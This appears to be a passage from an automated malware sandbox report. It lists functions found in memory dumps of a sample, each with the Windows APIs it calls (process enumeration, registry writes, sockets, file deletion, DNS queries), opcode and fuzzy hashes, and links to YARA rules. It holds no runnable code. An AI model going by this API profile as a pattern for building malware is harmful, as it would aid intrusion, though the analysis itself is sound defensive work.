Instruction Fuzzy Hash: 5C2190725093C05FEB13CB25DC54A92BFB4AF47224F0984DAED858F663D275A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05291EEE, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05291F59

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 95c800ed7d962fd6698a8efe045a5d09a22db9d6c9d96fe80301fbf98e894d56
Instruction ID: bd6120f28266f09d6603ad9698738bde591383c9f189d9309ff95d8c9330d3e8
Opcode Fuzzy Hash: 95c800ed7d962fd6698a8efe045a5d09a22db9d6c9d96fe80301fbf98e894d56
Instruction Fuzzy Hash: 90219D71504304AFEB24DF26DC45B66FBE8EF44320F14846AED898B351D7B5E408CA71

Uniqueness

Uniqueness Score: -1.00%

Function 05291225, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,ACD6084B,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05291296

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 145606dd4e1d4751f2405de6d8427459c6620f1697cfa4338a4ca4fba348e976
Instruction ID: defe434b3b3ff192a12b65407a3fcd4a26911eac785da5f40f06ef876509a8fc
Opcode Fuzzy Hash: 145606dd4e1d4751f2405de6d8427459c6620f1697cfa4338a4ca4fba348e976
Instruction Fuzzy Hash: 522180715093849FDB12CB25DC44B92FFE4AF06210F0984EAE989CB263D274A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05291FEE, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 05292062

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: d358fdeeafa259262cc6d07056e65c4960ecfd8a666d429a4fe91e561992083e
Instruction ID: 5f7ba4841d7c01b597f43bd7700aa89d90804ff3d5b91e90b40e257508c47861
Opcode Fuzzy Hash: d358fdeeafa259262cc6d07056e65c4960ecfd8a666d429a4fe91e561992083e
Instruction Fuzzy Hash: 6721AE71500204EFEB21DF25DC44FA6FFE8EF08320F14845AEA899B251D7B1A509CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052919FE, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32 ref: 05291A6A

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 1464367d49060d8bd89d8a73802b9397fa844782e32c4de142cccd355e3f8fb1
Instruction ID: 704d58b9ebf55f26063660b170725a44147a5545e5159f895c4d2a13a91d1cce
Opcode Fuzzy Hash: 1464367d49060d8bd89d8a73802b9397fa844782e32c4de142cccd355e3f8fb1
Instruction Fuzzy Hash: 7E21CF71500340AFEB21DF65DC44F66FFE8EF08310F14855EEE858A251C3B1A818CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05290B9E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E2C,ACD6084B,00000000,00000000,00000000,00000000), ref: 05290C10

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: f56b08e8486cbdce3e3da89d57f5f9c1b55479349a1d73b3d5ef6e1821d1108a
Instruction ID: c8d7bb0a01ff10d14826faa1be0a59ecb3f9708c8d32dcb1a84223244c7e8495
Opcode Fuzzy Hash: f56b08e8486cbdce3e3da89d57f5f9c1b55479349a1d73b3d5ef6e1821d1108a
Instruction Fuzzy Hash: 28119072510608AFEB20DF15DC85F67FBECEF04710F14846AEE499B351D6A0E409CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 052904EA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,ACD6084B,00000000,00000000,00000000,00000000), ref: 0529055C

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 7c419eca7c90f10dc7dee3f3308beaf3f4fa99f8e0cb977a3b7d028138413ff9
Instruction ID: 51c1df911cba2f5108eb11724887cdfc96f0f7f574976931cb57593a81a92e88
Opcode Fuzzy Hash: 7c419eca7c90f10dc7dee3f3308beaf3f4fa99f8e0cb977a3b7d028138413ff9
Instruction Fuzzy Hash: 9A116A72510604EEEB20DF15DC84F67FBE8FF08720F14846AEA4A9B352D6A0E409CA71

Uniqueness

Uniqueness Score: -1.00%

Function 0529245A, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E2C,ACD6084B,00000000,00000000,00000000,00000000), ref: 052924B9

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 2ce31ee1741b1b26f454ac994c487d9c83cafbe133f8f5c16e45d3d1d25649e4
Instruction ID: 48126fb868070709b5dd5b18f901151518616c0376c654801534caab196f83ee
Opcode Fuzzy Hash: 2ce31ee1741b1b26f454ac994c487d9c83cafbe133f8f5c16e45d3d1d25649e4
Instruction Fuzzy Hash: 87118E76500600EFEB21CF65DC45FAAFBA8EF49320F14846BEA499A251D6B4A4098B71

Uniqueness

Uniqueness Score: -1.00%

Function 05290E9C, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 05290F06

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: b9f2f9e09b46fd008d7a4b707460dbf7f127097a0d849500f9e3d9f1c641f8b4
Instruction ID: 4fe51e70cfc65fdf58fe5e21807fcd26755be1aa75519faea16b5571c59cdf03
Opcode Fuzzy Hash: b9f2f9e09b46fd008d7a4b707460dbf7f127097a0d849500f9e3d9f1c641f8b4
Instruction Fuzzy Hash: E311A2725083849FDB15CF25DC88B56FFE8EF45210F0884AEED49CB252D274E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05290C86, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?,00000E2C), ref: 05290CEF

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 85cd5aed7f8b02be528a4267ab81bb459df73426a8068e06b1bd7dbf0d43ef41
Instruction ID: 525040533a5841418d2427fedf44ceb60f3c76a832bacf34c0c30d6dcd8042c8
Opcode Fuzzy Hash: 85cd5aed7f8b02be528a4267ab81bb459df73426a8068e06b1bd7dbf0d43ef41
Instruction Fuzzy Hash: D4110675100204AFFB24DB29DC45F7AFBA8DF45720F14806AEE059A381D6B4A948CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 052909F2, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E2C,ACD6084B,00000000,00000000,00000000,00000000), ref: 05290A51

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: e61ebc247c7652c343e17cf4fbe9d9cc46dadaeaee73fbaef69d127499133c46
Instruction ID: 07ad9f049f7d4d886bbd46760fb4e752f935286a23c386bf02d76ef5735cce89
Opcode Fuzzy Hash: e61ebc247c7652c343e17cf4fbe9d9cc46dadaeaee73fbaef69d127499133c46
Instruction Fuzzy Hash: 0611C171400204EFEB21CF55DC44F6AFFA8EF44320F14846BEE499B251C6B4A408CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 052902DE, Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,00000E2C), ref: 05290353

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5964112e94525c57d71e1e53aaabb7c197f66a11362a6294cfaae6495037a699
Instruction ID: 846ceb30c815c8ecdfbae48185fb8c0ec0b163360c857161f117d810bdbdff44
Opcode Fuzzy Hash: 5964112e94525c57d71e1e53aaabb7c197f66a11362a6294cfaae6495037a699
Instruction Fuzzy Hash: 85112031000704EFEB35DF15CC85F6AFFA8EF08720F14849AEE495A291C2B1A508CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 05290D33, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 05290D98

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 9d73bd152396dc8db2f0fdd244763b150503ceeeb0827b703117a9c3575ee8ce
Instruction ID: 6034cb9dd7f6aa1551a8dc1b0d41b28d3f527484c37ba3dc46f01c631fcd0c42
Opcode Fuzzy Hash: 9d73bd152396dc8db2f0fdd244763b150503ceeeb0827b703117a9c3575ee8ce
Instruction Fuzzy Hash: 591190714093C4AFD7128B24DC44B96FFB4EF46224F0984EBED888F263C275A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05290EBE, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 05290F06

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 52e2483206b5ab7ac77144d923bebef02d73328c73cb41d1420473dc1d9f544b
Instruction ID: 337bf9a52b87cac48c3135e79a70d98f5708fa4689054d3a1d96672b12703e33
Opcode Fuzzy Hash: 52e2483206b5ab7ac77144d923bebef02d73328c73cb41d1420473dc1d9f544b
Instruction Fuzzy Hash: AC118E726142059FDB14CF29D888B66FBE8EF04220F08C4AAED4DCB752D6B0E508CA61

Uniqueness

Uniqueness Score: -1.00%

Function 05290AD6, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 05290B1E

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 52e2483206b5ab7ac77144d923bebef02d73328c73cb41d1420473dc1d9f544b
Instruction ID: 5803e3e7ddcc9607037627e0ae2dbc5db7012151bc44d74b03980ec7bde98d18
Opcode Fuzzy Hash: 52e2483206b5ab7ac77144d923bebef02d73328c73cb41d1420473dc1d9f544b
Instruction Fuzzy Hash: EC117CB16102099FDB54CF29D889B66FBE8EF44324F1884AADD09DB356D674E408CA61

Uniqueness

Uniqueness Score: -1.00%

Function 05290932, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,ACD6084B,00000000,00000000,00000000,00000000), ref: 05290985

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: b0d1cd33cec760b3467d46c0f1586c7e51067bd5aba34b25201226258c1667c5
Instruction ID: 1b4f30d673e102381179e188f6856d37b91e116c6a26f06564e2e0c67c390ac8
Opcode Fuzzy Hash: b0d1cd33cec760b3467d46c0f1586c7e51067bd5aba34b25201226258c1667c5
Instruction Fuzzy Hash: 0601D271510604AEFB10DB19DC85F66FFA8EF45720F14C4ABEE499B341C6B4A408CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0529075A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 0529079F

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 15cd134d0ef84ebcc11327a63e20a028c27da93cad6f7de73b346c71336d6829
Instruction ID: 1711a73191da1d6c65d00b015dab8889a1af33767f32679bd12f28245cf00d70
Opcode Fuzzy Hash: 15cd134d0ef84ebcc11327a63e20a028c27da93cad6f7de73b346c71336d6829
Instruction Fuzzy Hash: A011C4756102059FEB14CF29D888BA6FFD8EF04220F08C4AADD09DB741D6B4E408CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05291256, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,ACD6084B,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05291296

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 9d6d49ed370449710c4e2e01ecc1fc28d7693e8fb66df96bccb265c1da84a47b
Instruction ID: 970f1eb610de1cf62646a04d8ba3abcbcd649dac32eedebce1e1d085c0b11d17
Opcode Fuzzy Hash: 9d6d49ed370449710c4e2e01ecc1fc28d7693e8fb66df96bccb265c1da84a47b
Instruction Fuzzy Hash: D111AD759102459FDB24DF6AD884BA6FBE8EF04320F08C4AADD09CB716D6B0E458CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05292A0E, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 05292A5E

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 13fe4016083bf4553e2f8330515c8867ed87991c9121d0eccb90017ed221099b
Instruction ID: e4b2ab478ae0d5249e1142cf33807b7484aa91fbb5c61e3cbb5d677b5e6641ad
Opcode Fuzzy Hash: 13fe4016083bf4553e2f8330515c8867ed87991c9121d0eccb90017ed221099b
Instruction Fuzzy Hash: 3101B172500200ABE310DF16DC81F26FBA8EBC8B20F14C12AED089B741E331B915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 05290232, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 05290264

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: e88475b2dd1cb4697c6f63d173e937d5f9f652e9d4a761b2fbfa0dfdeff36de5
Instruction ID: d7e4a34ccb78acd290f2ebf09460133742161a057da21f1c9f0b691691349be4
Opcode Fuzzy Hash: e88475b2dd1cb4697c6f63d173e937d5f9f652e9d4a761b2fbfa0dfdeff36de5
Instruction Fuzzy Hash: 8601DF719102049FEB14CF29D888766FF94EF44320F08C4ABDD098F752D6B5A408CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052911AA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 052911DC

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 718c21cdaf7e11754d5de150f70ec308f5539dd473be4bfcadd6baaee78b1e2f
Instruction ID: 55e48bbea345f1392bea673a981c393c8f8d5dd5323447cb935af8f88b072a31
Opcode Fuzzy Hash: 718c21cdaf7e11754d5de150f70ec308f5539dd473be4bfcadd6baaee78b1e2f
Instruction Fuzzy Hash: B301DF719102419FDB14DF2AD884B66FFE4EF44220F18C0ABDD098F712D6B4A818CB72

Uniqueness

Uniqueness Score: -1.00%

Function 052914E2, Relevance: 1.5, APIs: 1, Instructions: 43networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,00000E2C,?,?), ref: 05291532

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 2bebfd2bf5eed1de3e7d72e909ca094239d0b8681ae5989263eb4ec69c41d29b
Instruction ID: 39e7b561dc4bab1e5cc17547d7fb788a990974b83a77621e7e19780f4d952bdf
Opcode Fuzzy Hash: 2bebfd2bf5eed1de3e7d72e909ca094239d0b8681ae5989263eb4ec69c41d29b
Instruction Fuzzy Hash: F4018B76500600ABD210DF16DC82F26FBA8EB88B20F14811AED085BB41E371B916CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 052320D0, Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

r*+, xrefs: 0523230F

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: 347532d46b04bda5c9ee4a1878438caba30cd8c73d5876a425fc75e92f36f330
Instruction ID: a29487fc606903c3a52d589723673d4008333cf30c10873799a39c3c12887047
Opcode Fuzzy Hash: 347532d46b04bda5c9ee4a1878438caba30cd8c73d5876a425fc75e92f36f330
Instruction Fuzzy Hash: E171B474E2820ADFCB58DFA8C9826BEBBB2FF84300F10806AC556D7265DB759D41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05231458, Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

$ghr, xrefs: 052314C7

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: $ghr
API String ID: 0-1352911727
Opcode ID: f300e0b839fb25f5736dee00ebdc86ca9355b9108e8cc7656bacd6b32edaa248
Instruction ID: 3b5b57b63d129fb2864a44b4fc5d1957e400a328e8989e5607f582e1226eb646
Opcode Fuzzy Hash: f300e0b839fb25f5736dee00ebdc86ca9355b9108e8cc7656bacd6b32edaa248
Instruction Fuzzy Hash: 0351F374A00219DFDB64DF68C994B9DBBB2BF48300F1040EAD80AAB361DB759D89CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05231291, Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

$ghr, xrefs: 05231349

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: $ghr
API String ID: 0-1352911727
Opcode ID: 5a365053ce35fac595f355f229b20f974cba670528ee370c6ea28655471dcebb
Instruction ID: 830770a4b389b78b5c044d0b0dcfffd21b6fcf1cbd56eb9be2f784e366209dc5
Opcode Fuzzy Hash: 5a365053ce35fac595f355f229b20f974cba670528ee370c6ea28655471dcebb
Instruction Fuzzy Hash: DB413470E14218DFCB64DF68C881BADBBB2BF49300F1040AAD80AAB750DB759D94CF61

Uniqueness

Uniqueness Score: -1.00%

Function 052385F0, Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

r*+, xrefs: 05238707

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: 4c9cfe135ad92ce47a18cbf50921d0c855aaf866fb534ce293125c1d0f528cf8
Instruction ID: 2fa7d8cef82e906b43588240ddf9d021b80bb719e65ee7e28fcf7cfe1a580221
Opcode Fuzzy Hash: 4c9cfe135ad92ce47a18cbf50921d0c855aaf866fb534ce293125c1d0f528cf8
Instruction Fuzzy Hash: 974141B4E25209DFCB58DFA5C5566BEBBF2FF44304F10406AE406AB260DBB44A41CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0523DC79, Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

lir, xrefs: 0523DD33

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: lir
API String ID: 0-3872640509
Opcode ID: 838d0dfb51027bea7e68def46fca10d419316447d49548dfe19fa4f3709853bf
Instruction ID: 0edb6599d7accc81e3f99ab475e607e6228154c329e1480181b9389a3ca65150
Opcode Fuzzy Hash: 838d0dfb51027bea7e68def46fca10d419316447d49548dfe19fa4f3709853bf
Instruction Fuzzy Hash: 7B21BDF6A38119CBCB15DB6894013BABBF2FF88394F20457AE446DB240DBB19C428790

Uniqueness

Uniqueness Score: -1.00%

Function 0523A020, Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

Huir, xrefs: 0523A053

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: Huir
API String ID: 0-669697419
Opcode ID: c40293fdfd04ca27cfe1228d04cee50770626c53cb22b8af6b46506ff2f77c88
Instruction ID: 60cc680762b8ea9c4178faa65d3f8ef860e85057c9f509058df216201d9e7e40
Opcode Fuzzy Hash: c40293fdfd04ca27cfe1228d04cee50770626c53cb22b8af6b46506ff2f77c88
Instruction Fuzzy Hash: 60F044713182418BC7886B6C6C9167D7F27AFC622032443BED495CB2D1DF645C1283A6

Uniqueness

Uniqueness Score: -1.00%

Function 05237318, Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Huir, xrefs: 0523734B

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: Huir
API String ID: 0-669697419
Opcode ID: de5af59232f6ba7fb5b65537822321f651d0f5d42ceb5dffb7dcf9e2936c1684
Instruction ID: 445ca8e8137fcd9d9c9513aea03bc436d15ebed805ca422b4873af16b033c69d
Opcode Fuzzy Hash: de5af59232f6ba7fb5b65537822321f651d0f5d42ceb5dffb7dcf9e2936c1684
Instruction Fuzzy Hash: F6F022B23182509BCB496A6C9C8166D3B17AFC6274328036BD91ACF3C6DE658D0643A2

Uniqueness

Uniqueness Score: -1.00%

Function 05234710, Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

X1kr, xrefs: 05234747

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: X1kr
API String ID: 0-844551562
Opcode ID: d8abcea998169b9fc10f72c4c127531c12b7c4a8702c96c2495f0e25b99e23d0
Instruction ID: 321cee7df8a1efde9ca0c774714d632b669a88918927914203a23ab39b442b2a
Opcode Fuzzy Hash: d8abcea998169b9fc10f72c4c127531c12b7c4a8702c96c2495f0e25b99e23d0
Instruction Fuzzy Hash: A5F0F0363612509BCB28A6B994053BE368B8FC6665F94007EE20AC7780D966D88243D0

Uniqueness

Uniqueness Score: -1.00%

Function 05237328, Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

Huir, xrefs: 0523734B

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: Huir
API String ID: 0-669697419
Opcode ID: edc253869477470f45d6e644281fcf8c9c169df1dde78f33d7e3c051cc8f2ab0
Instruction ID: 022224f93502f47d0651e78b8354781bb7b7d7a10b17dd89b50ddff6bb8f60da
Opcode Fuzzy Hash: edc253869477470f45d6e644281fcf8c9c169df1dde78f33d7e3c051cc8f2ab0
Instruction Fuzzy Hash: 8EF0B4B131821093CB48696C9C81A6E7A4BEFC5670778432AA91A8B3C4DEA19D0143A6

Uniqueness

Uniqueness Score: -1.00%

Function 05235EB9, Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

lir, xrefs: 05235ED6

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: lir
API String ID: 0-3872640509
Opcode ID: aa36967528ee950ca969788bbb0f19e505690162f315cdc37723c13989768d11
Instruction ID: d07ca72e10a698dd9ecc17573dbe549b73dab2cd728f1a493dced75fee338424
Opcode Fuzzy Hash: aa36967528ee950ca969788bbb0f19e505690162f315cdc37723c13989768d11
Instruction Fuzzy Hash: 3BE0683574D3C04FDB198BBC985097E3B6C5E8252130606AFE457CB2D0EF100802C395

Uniqueness

Uniqueness Score: -1.00%

Function 05235EC8, Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

lir, xrefs: 05235ED6

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: lir
API String ID: 0-3872640509
Opcode ID: 6a908554a352bd396c7da71af3454f56b7d4896915f1964e0352f97fdf0102f0
Instruction ID: 19484582d56ff032c7bd73de816e896162c281319e73f15d474ec43f1399731f
Opcode Fuzzy Hash: 6a908554a352bd396c7da71af3454f56b7d4896915f1964e0352f97fdf0102f0
Instruction Fuzzy Hash: 7BD0A735745254175A186ABE980063F374E6FC0951301442EE90BD7380EF128C0143EA

Uniqueness

Uniqueness Score: -1.00%

Function 0523E858, Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f068850165f4f37ecf70500f833bcdb276036d4fb83adb87e64efc821435d85
Instruction ID: d00c0184160d1f5e921f240431675b0a5169510200a447417c6de0fa647edf85
Opcode Fuzzy Hash: 8f068850165f4f37ecf70500f833bcdb276036d4fb83adb87e64efc821435d85
Instruction Fuzzy Hash: F7B1E6B0A24606CFDB29CF29C48176EBBF7FF84300F16846AD44A9B291D775E849CB40

Uniqueness

Uniqueness Score: -1.00%

Function 052380E0, Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e66f9ac1d3a21f55369d1fe022481eb60ca733c9b0c052593ed1a6deab79084e
Instruction ID: eba48c416515709993f382d48fd0e156f6d1c22ddac20df74066d8ad185bf104
Opcode Fuzzy Hash: e66f9ac1d3a21f55369d1fe022481eb60ca733c9b0c052593ed1a6deab79084e
Instruction Fuzzy Hash: C9A149B5E11209DFCB14CFA8C9859ADFBF1FF48310F20856AE46AAB250D731A955CB81

Uniqueness

Uniqueness Score: -1.00%

Function 05235F68, Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cb847ffe2c395a6eebeb55deda81ebe7ac903ff7858f553a98790ac55a96c42
Instruction ID: 3dc9f7dfebeafa18d7b0e0f6d62507ac991a43e85289cdfd30b7eafaacfed1f0
Opcode Fuzzy Hash: 9cb847ffe2c395a6eebeb55deda81ebe7ac903ff7858f553a98790ac55a96c42
Instruction Fuzzy Hash: 2A819E71A10619DFDF15CF14C881AEAB7B3BF85304F1584A5D80AAF251DB71AE8ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 0523AABF, Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 386dcea3f3378e3ff8f3ae8822d409f2f044e9927e72f5fcf60be1dd495cb0cd
Instruction ID: ea9bf14595cb04168e077611002a1db7a4011d7d7b0f6604ef239ce91f417f69
Opcode Fuzzy Hash: 386dcea3f3378e3ff8f3ae8822d409f2f044e9927e72f5fcf60be1dd495cb0cd
Instruction Fuzzy Hash: 41819A31700516CBD708EB68C891A6EBBB7FFC4314FA09628D6569B794DF709C06CB92

Uniqueness

Uniqueness Score: -1.00%

Function 05234DB8, Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

